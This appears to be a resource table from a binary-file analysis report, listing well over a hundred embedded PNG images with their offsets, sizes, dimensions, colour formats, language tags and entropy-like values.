                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c3c280x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c5f980x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c5bd80x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c4fd80xbffPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035818951481603
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ba1600x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bc4500x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bc0f80x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bb5000xbf8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035900783289817
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b74980x1e3PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0227743271221532
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b76800x3d2PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112474437627812
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b7b300x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b9df80x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b9a800x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b8ee00xb9aPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037037037037038
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b7a580xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c63000x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c86f80x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c83000x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c76980xc62PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034700315457412
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bc7d00x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bea300x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3be6f00x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bdb680xb84PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003392130257802
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b5e900xb1PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0169491525423728
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a21e80x1daPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232067510548524
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a1e700x375PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124293785310734
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b16000x1a5PNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0261282660332542
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b17a80x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b1b680x11aPNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0283687943262412
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b15980x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b49e80xe0PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03125
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b4de80xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b4ac80x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b4d500x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b40600x985PNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00451374640952
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b36900x9caPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00438946528332
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b33500x339PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0133333333333334
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c2c00x214PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0206766917293233
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c4d80x22ePNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0197132616487454
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c7a00xb3PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.011173184357542
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c7080x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9932885906040269
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c8580x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39cc700x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d0880x1fbPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0216962524654833
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d2880x179PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159151193633953
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d5d00x179PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0053050397877985
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d7500x114PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0289855072463767
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d4080x10ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011111111111111
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d5180xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0054945054945055
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d8680x17ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d9e80x15cPNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0201149425287357
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f5a00xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a05100x143PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0340557275541795
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f2280x110PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f1a00x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39eb000x13bPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0253968253968253
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39e6580x4a1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009282700421941
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d07080x25ePNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018151815181518
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d04f00x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cd4880x167PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9972144846796658
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cd7100x278PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174050632911393
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cd5f00x11aPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9680851063829787
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d00300xd4PNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.0235849056603774
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cf1780x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cf5080x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cf8200x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cf7700xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cf9400x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cef680x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d03f80xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d19c00xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d18700x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d01080xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d01b80x8bPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d02480x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d02e00x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d03780x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e78400xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e77800xbdPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0105820105820107
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e27800xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d9d600x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3dbb480x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3dbd080x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e73100x46cPNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0097173144876326
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e36100xafPNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171428571428571
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e06900x701PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0061349693251533
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e0d980x498PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0093537414965987
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e1c780x5c1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074677528852682
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e22400x539PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082273747195214
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e12300x5c7PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074374577417173
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e17f80x47fPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009556907037359
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d39a80x585PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077848549186128
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d44180x546PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0081481481481482
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d3f300x4e1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0088070456365092
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d49600x5b0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007554945054945
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d7fd80x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d81900xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d82800x1ad9PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0016004655899897
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3dcb100xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3dd6580x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ddc680x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3df5180x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d59e80x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d4f100xad3PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039696860339227
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e79900xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e85580xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e43680x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e3dd00x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e37d80x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e33e80x228PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019927536231884
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e49480x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3dc2480x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3dc5d80x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d1a680x32fPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0134969325153373
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d1d980xef8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9950417536534447
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d2c900x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f52f00x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f7cb00x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f79180x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f66b80x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f24d80x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f4f800x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f4bb00x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f38900x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f80300x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3faa180x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fa6580x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f93e00x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ecbe80x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ef5680x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ef2100x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3edf880x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e91880x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e9b280x2e6PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148247978436657
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e9ee80x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ec8800x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ec5080x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3eb2980x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e9e100xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fad800x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fd8180x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fd4200x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fc1180x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ef8e80x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f21600x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f1e200x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f0c800x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e78e80xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d30080x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d2d100x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e31f00x17ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e33700x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e36c00x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e31880x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e64d80xd7PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232558139534884
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e68d00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e65b00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e68380x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e5b680x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e51c80x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e4ed00x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cd9880x1d3PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019271948608137
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cdb600x1f8PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0138888888888888
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cddf00x67PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States0.9514563106796117
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cdd580x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cde580x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce1f80x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce5980x1c1PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024498886414254
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce7600x153PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0324483775811208
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cea780x15fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113960113960114
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cebd80x100PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03515625
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce8b80x108PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018939393939394
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce9c00xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010989010989011
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cecd80x151PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032640949554896
